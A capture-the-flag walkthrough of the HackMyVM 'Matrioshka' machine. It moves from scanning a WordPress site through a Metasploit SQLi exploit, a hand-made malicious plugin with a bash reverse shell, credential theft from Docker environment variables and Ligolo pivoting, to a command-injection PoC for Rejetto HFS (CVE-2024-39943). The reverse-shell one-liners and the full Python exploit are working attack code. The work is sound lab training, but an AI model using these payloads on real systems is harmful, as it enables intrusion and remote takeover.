HackMyVM-Matrioshka-Walkthrough
城南花已开 Lv6

Information Gathering

Service Probing

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.236 08:00:27:0e:8d:17 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f5:54:75 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded
export ip=192.168.60.236
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.236:22
Open 192.168.60.236:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 16:31 CST
Initiating ARP Ping Scan at 16:31
Scanning 192.168.60.236 [1 port]
Completed ARP Ping Scan at 16:31, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:31
Completed Parallel DNS resolution of 1 host. at 16:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:31
Scanning 192.168.60.236 [2 ports]
Discovered open port 22/tcp on 192.168.60.236
Discovered open port 80/tcp on 192.168.60.236
Completed SYN Stealth Scan at 16:31, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.236
Host is up, received arp-response (0.00031s latency).
Scanned at 2025-03-09 16:31:16 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:0E:8D:17 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Enumerating directories shows that this is a WordPress site.

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.236
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 301) [Size: 0] [--> http://192.168.60.236/]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.60.236/wp-content/]
/wp-login.php (Status: 200) [Size: 3931]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.60.236/wp-includes/]
/readme.html (Status: 200) [Size: 7409]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.60.236/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/wp-signup.php (Status: 302) [Size: 0] [--> http://mamushka.hmv/wp-login.php?action=register]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Visiting port 80 in the browser reveals a domain name.

Add it to the hosts file:

echo "$ip mamushka.hmv"|sudo tee -a /etc/hosts
192.168.60.236 mamushka.hmv

Scan it with wpscan:

❯ wpscan --url http://mamushka.hmv -e u,ap --plugins-detection aggressive --api-token "vIrpyD0oybubw9Q12LG1MH5vyWekAer6SoesmdarpVo"
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://mamushka.hmv/ [192.168.60.236]
[+] Started: Sun Mar 9 17:48:41 2025

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.61 (Debian)
| - X-Powered-By: PHP/8.2.22
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://mamushka.hmv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.2 identified (Latest, released on 2025-02-11).
| Found By: Query Parameter In Install Page (Aggressive Detection)
| - http://mamushka.hmv/wp-includes/css/dashicons.min.css?ver=6.7.2
| - http://mamushka.hmv/wp-includes/css/buttons.min.css?ver=6.7.2
| - http://mamushka.hmv/wp-admin/css/forms.min.css?ver=6.7.2
| - http://mamushka.hmv/wp-admin/css/l10n.min.css?ver=6.7.2
| - http://mamushka.hmv/wp-admin/css/install.min.css?ver=6.7.2

[+] WordPress theme in use: twentytwentyfour
| Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.3
| Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:02:35 <================================================================> (109390 / 109390) 100.00% Time: 00:02:35
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://mamushka.hmv/wp-content/plugins/akismet/
| Latest Version: 5.3.7
| Last Updated: 2025-02-14T18:49:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/akismet/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
| - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
| - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
|
| The version could not be determined.

[+] meta-generator-and-version-info-remover
| Location: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/
| Latest Version: 16.0 (up to date)
| Last Updated: 2024-11-20T05:03:00.000Z
| Readme: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/, status: 403
|
| Version: 16.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt

[+] ultimate-member
| Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
| Last Updated: 2025-03-03T17:36:00.000Z
| Readme: http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
| [!] The version is out of date, the latest version is 2.10.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/ultimate-member/, status: 403
|
| [!] 7 vulnerabilities identified:
|
| [!] Title: Ultimate Member < 2.8.7 - Cross-Site Request Forgery to Membership Status Change
| Fixed in: 2.8.7
| References:
| - https://wpscan.com/vulnerability/2b670a80-2682-4b7f-a549-64a35345e630
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8520
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffddc03-d4ae-460e-972a-98804d947d09
|
| [!] Title: Ultimate Member < 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 2.8.7
| References:
| - https://wpscan.com/vulnerability/7488f9f3-03ea-4f4e-b5fb-c0dd02c5bb59
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8519
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e394bb2-d505-4bf1-b672-fea3504bf936
|
| [!] Title: Ultimate Member < 2.9.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Profile Picture Update
| Fixed in: 2.9.0
| References:
| - https://wpscan.com/vulnerability/54a53b30-4249-4559-85f8-7aeac2dc0df2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10528
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a9793b6-2186-46ef-b204-d8f8f154ebf3
|
| [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.9.2 - Information Exposure
| Fixed in: 2.9.2
| References:
| - https://wpscan.com/vulnerability/cb9c5ef8-51f8-4a46-ae56-23302c5980aa
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0318
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ee149bf-ffa3-4906-8be2-9c3c40b28287
|
| [!] Title: Ultimate Member < 2.9.2 - Unauthenticated SQL Injection
| Fixed in: 2.9.2
| References:
| - https://wpscan.com/vulnerability/31ef60db-4847-4623-a194-8722e668e6ab
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0308
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890
|
| [!] Title: Ultimate Member < 2.10.0 - Authenticated SQL Injection
| Fixed in: 2.10.0
| References:
| - https://wpscan.com/vulnerability/90b5192a-ceee-4612-8e21-2341bae29cad
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12276
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/846f9828-2f1f-4d08-abfb-909b8d634d8a
|
| [!] Title: Ultimate Member < 2.10.1 - Unauthenticated SQLi
| Fixed in: 2.10.1
| References:
| - https://wpscan.com/vulnerability/1d39ff72-1178-4812-be55-9bf4b58bbbb6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1702
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/34adbae5-d615-4f8d-a845-6741d897f06c
|
| Version: 2.8.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt

[+] wp-automatic
| Location: http://mamushka.hmv/wp-content/plugins/wp-automatic/
| Latest Version: 3.109.2
| Last Updated: 2025-03-09T10:54:44.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/wp-automatic/, status: 200
|
| [!] 7 vulnerabilities identified:
|
| [!] Title: Automatic 2.0.3 - csv.php q Parameter SQL Injection
| Fixed in: 2.0.4
| References:
| - https://wpscan.com/vulnerability/dadc99ca-54ee-42b4-b247-79a47b884f03
| - https://www.exploit-db.com/exploits/19187/
| - https://packetstormsecurity.com/files/113763/
|
| [!] Title: WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update
| Fixed in: 3.53.3
| References:
| - https://wpscan.com/vulnerability/4e5202b8-7317-4a10-b9f3-fd6999192e15
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4374
| - https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/
|
| [!] Title: Automatic < 3.92.1 - Cross-Site Request Forgery to Privilege Escalation
| Fixed in: 3.92.1
| References:
| - https://wpscan.com/vulnerability/fa2f3687-7a5f-4781-8284-6fbea7fafd0e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27955
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/12adf619-4be8-4ecf-8f67-284fc44d87d0
|
| [!] Title: Automatic < 3.92.1 - Unauthenticated Arbitrary File Download and Server-Side Request Forgery
| Fixed in: 3.92.1
| References:
| - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/620e8931-64f0-4d9c-9a4c-1f5a703845ff
|
| [!] Title: Automatic < 3.92.1 - Unauthenticated SQL Injection
| Fixed in: 3.92.1
| References:
| - https://wpscan.com/vulnerability/53a51e79-a216-4ca3-ac2d-57098fd2ebb5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b319be-f312-4d02-840f-e2a91c16b67a
|
| [!] Title: WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery
| Fixed in: 3.93.0
| References:
| - https://wpscan.com/vulnerability/e5d0dcec-41a7-40ae-b9ce-f839de9c28b8
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32693
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/6231e47e-2120-4746-97c1-2aa80aa18f4e
|
| [!] Title: WordPress Automatic < 3.95.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via autoplay Parameter
| Fixed in: 3.95.0
| References:
| - https://wpscan.com/vulnerability/d0198310-b323-476a-adf8-10504383ce1c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4849
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/4be58bfa-d489-45f5-9169-db8bab718175
|
| The version could not be determined.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 6
| Requests Remaining: 16

[+] Finished: Sun Mar 9 17:51:32 2025
[+] Requests Done: 109475
[+] Cached Requests: 22
[+] Data Sent: 29.291 MB
[+] Data Received: 15.241 MB
[+] Memory used: 465.801 MB
[+] Elapsed time: 00:02:50

The ultimate-member plugin is behind the latest version, and this version has many known vulnerabilities.

However, after searching, I found no existing PoC I could use.

But there is also the Automatic plugin, which has a SQL injection vulnerability.

Exploitation with msfconsole

Metasploit has a ready-made module for it.

The expected end result is a reverse shell, but uploading the payload fails, because newer WordPress versions do not allow uploading PHP files.

❯ msfconsole
Metasploit tip: View a module's description using info, or the enhanced
version in your browser with info -d


______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|


=[ metasploit v6.4.38-dev ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search wp_automatic

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/wp_automatic_plugin_privesc 2021-09-06 normal Yes WordPress Plugin Automatic Config Change to RCE
1 exploit/multi/http/wp_automatic_sqli_to_rce 2024-03-13 excellent Yes WordPress wp-automatic Plugin SQLi Admin Creation
2 \_ target: PHP In-Memory . . . .
3 \_ target: Unix/Linux Command Shell . . . .
4 \_ target: Windows Command Shell . . . .


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_automatic_sqli_to_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > show options

Module options (exploit/multi/http/wp_automatic_sqli_to_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
EMAIL [email protected] no Email for the new user
PASSWORD dhnPDH8ZWTb6v5k no Password for the new user
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME dorian.bartell no Username to create
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.60.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 PHP In-Memory



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set RHOSTS 192.168.60.236
RHOSTS => 192.168.60.236
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > exploit

[*] Started reverse TCP handler on 192.168.60.100:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting SQLi test to verify vulnerability...
[+] The target is vulnerable. Target is vulnerable to SQLi!
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/fixflex/port.php...
[!] This exploit may require manual cleanup of 'port.php' on the target
[!] This exploit may require manual cleanup of 'fixflex.php' on the target
[!] This exploit may require manual cleanup of '../fixflex' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) >

Fortunately, it did successfully create the administrator account dorian.bartell:dhnPDH8ZWTb6v5k.

Trying to log in with it succeeds.

Uploading a Malicious Plugin

We can try to get a reverse shell through the Add Plugin page.

[Wordpress - HackTricks](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html?highlight=wordpress plugins#plugin-rce)

wetw0rk/malicious-wordpress-plugin: Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.

Alternatively, write a malicious PHP file by hand and zip it:

❯ vi rev.php
<?php
/**
* Plugin Name: GetRev
* Version: 10.8.1
* Author: PwnedSauce
* Author URI: http://PwnedSauce.com
* License: GPL2
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.60.100/4444 0>&1'")
?>
❯ zip rev.zip rev.php
adding: rev.php (deflated 14%)

User Privilege Escalation

After uploading, activate the GetRev plugin and listen on the port.

But once the shell comes back, it turns out the current environment is inside Docker.

Looking through the environment variables with env reveals the WordPress database credentials matrioska:Fukurokuju.

❯ pwncat-cs -lp 4444
[19:01:47] Welcome to pwncat 🐈! __main__.py:164
[19:03:30] received connection from 192.168.60.236:58630 bind.py:84
[19:03:31] 192.168.60.236:58630: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$ env
HISTCONTROL=ignorespace
HOSTNAME=3ed5ddfe0e0c
PHP_VERSION=8.2.22
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/var/www/html/wp-admin
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
APACHE_PID_FILE=/var/run/apache2/apache2.pid
WORDPRESS_DB_HOST=db
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
TERM=screen-256color
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=3
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WORDPRESS_DB_PASSWORD=Fukurokuju
APACHE_RUN_DIR=/var/run/apache2
PS1=$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=www-data
WORDPRESS_DB_USER=matrioska
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WORDPRESS_DB_NAME=wordpressdb
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env

Guessing that these are also the SSH credentials, try to connect.

It does not connect; comparing with the target's name shows that matrioska is missing an h.

Connect again and grab the user flag.

❯ ssh matrioshka@$ip
matrioshka@192.168.60.236's password:
Linux matrioshka 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 22 19:12:21 2024 from 10.0.2.8
matrioshka@matrioshka:~$ cat user.txt
c8129b0390452d8378535cff76e0dde8

The target has multiple network interfaces, and many ports are open on localhost.

matrioshka@matrioshka:/tmp$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:44803 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:9090 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*

After pivoting into the internal network with Ligolo:

sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » interface_create --name "ligolo"
INFO[0006] Creating a new "ligolo" interface...
INFO[0006] Interface created!
ligolo-ng » INFO[0016] Agent joined. id=48a35bd8-3cec-4c94-b2f6-e23935c72802 name=matrioshka@matrioshka remote="192.168.60.236:53074"
ligolo-ng » session
? Specify a session : 1 - matrioshka@matrioshka - 192.168.60.236:53074 - 48a35bd8-3cec-4c94-b2f6-e23935c72802
[Agent : matrioshka@matrioshka] » tunnel_start --tun ligolo
[Agent : matrioshka@matrioshka] » INFO[0026] Starting tunnel to matrioshka@matrioshka (48a35bd8-3cec-4c94-b2f6-e23935c72802)
----------------------------------------------------------
## run on the target
matrioshka@matrioshka:/tmp$ ./agent -connect 192.168.60.100:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.60.100:11601"

PoC Exploitation

Visiting 172.19.0.2 gives a file server.

Trying weak passwords, the credentials turn out to be admin:admin.

The file server is HFS version 0.52.9.

Search for vulnerabilities in this version.

jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS: Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)

truonghuuphuc/CVE-2024-39943-Poc: CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

The CVE-2024-23692 PoC detects the target as vulnerable, but exploitation does not succeed.

CVE-2024-39943, however, allows arbitrary command execution after authentication.

Capture the cookie, then get a reverse shell. The PoC author was thoughtful enough to include a demo video, nice 🤣

Run the PoC:

❯ git clone https://github.com/truonghuuphuc/CVE-2024-39943-Poc.git
Cloning into 'CVE-2024-39943-Poc'...
remote: Enumerating objects: 70, done.
remote: Counting objects: 100% (70/70), done.
remote: Compressing objects: 100% (68/68), done.
remote: Total 70 (delta 30), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (70/70), 22.50 MiB | 6.83 MiB/s, done.
Resolving deltas: 100% (30/30), done.
cd CVE-2024-39943-Poc
❯ python poc_user_admin.py
Url: http://172.19.0.2/
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc0MTYxMTE1OTkwNywiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=rPgYkWCMMtmT6V70MBZcfLc8ds0
Ip: 172.19.0.1
Port: 4444
Step 1 add vfs
Step 2 set permission vfs
Step 3 create folder
Step 4 execute payload

Listening on the port, but nothing comes in.

matrioshka@matrioshka:/tmp$ busybox nc -lp 4444
id

Let's look at the PoC and analyze the script's logic; the author actually wrote it quite clearly.

It adds a virtual file system entry whose folder maps to the local /tmp directory.

The last step simply requests the folder ~/api/get_ls?path=/tmp/poc";python3 -c "import os;import base64;os.system(base64.b64decode(\''+base64.b64encode(command).decode('utf-8')+" via get_ls,

so RCE comes from the folder name being concatenated into a shell command.

import requests as req
import base64

url = input("Url: ")
cookie = input("Cookie: ")
ip = input("Ip: ")
port = input("Port: ")

headers = {"x-hfs-anti-csrf":"1","Cookie":cookie}

print("Step 1 add vfs")
step1 = req.post(url+"~/api/add_vfs", headers=headers, json={"parent":"/","source":"/tmp"})

print("Step 2 set permission vfs")
step2 = req.post(url+"~/api/set_vfs", headers=headers, json={"uri":"/tmp/","props":{"can_see":None,"can_read":None,"can_list":None,"can_upload":"*","can_delete":None,"can_archive":None,"source":"/tmp","name":"tmp","type":"folder","masks":None}})

print("Step 3 create folder")
command = "ncat {0} {1} -e /bin/bash".format(ip,port)
command = command.encode('utf-8')
payload = 'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\''+base64.b64encode(command).decode('utf-8')+"'))"
step3 = req.post(url+"~/api/create_folder", headers=headers, json={"uri":"/tmp/","name":payload})

print("Step 4 execute payload")
step4 = req.get(url+"~/api/get_ls?path=/tmp/"+payload, headers=headers)

But why doesn't it execute? Perhaps there is some filtering.

So let's try changing the reverse shell command and see whether it executes.

First, change the folder permissions.

Then modify the base64 value in the PoC folder name under /tmp, changing it to the base64 of wget 172.17.0.1:8000/user.txt -O /tmp/user.txt.

Meanwhile start an HTTP server on the target; the command does get executed:

matrioshka@matrioshka:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.19.0.2 - - [09/Mar/2025 09:27:50] "GET /user.txt HTTP/1.1" 200 -

Use wget to download rev.php into /tmp:

matrioshka@matrioshka:~$ vi rev.sh
/bin/bash -i >& /dev/tcp/172.19.0.1/4444 0>&1
matrioshka@matrioshka:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.19.0.2 - - [09/Mar/2025 09:36:58] "GET /rev.sh HTTP/1.1" 200 -

Although requesting rev.php will not get it parsed, you can simply run the command with bash inside the Docker container:

echo -n "bash /tmp/rev.sh"|base64
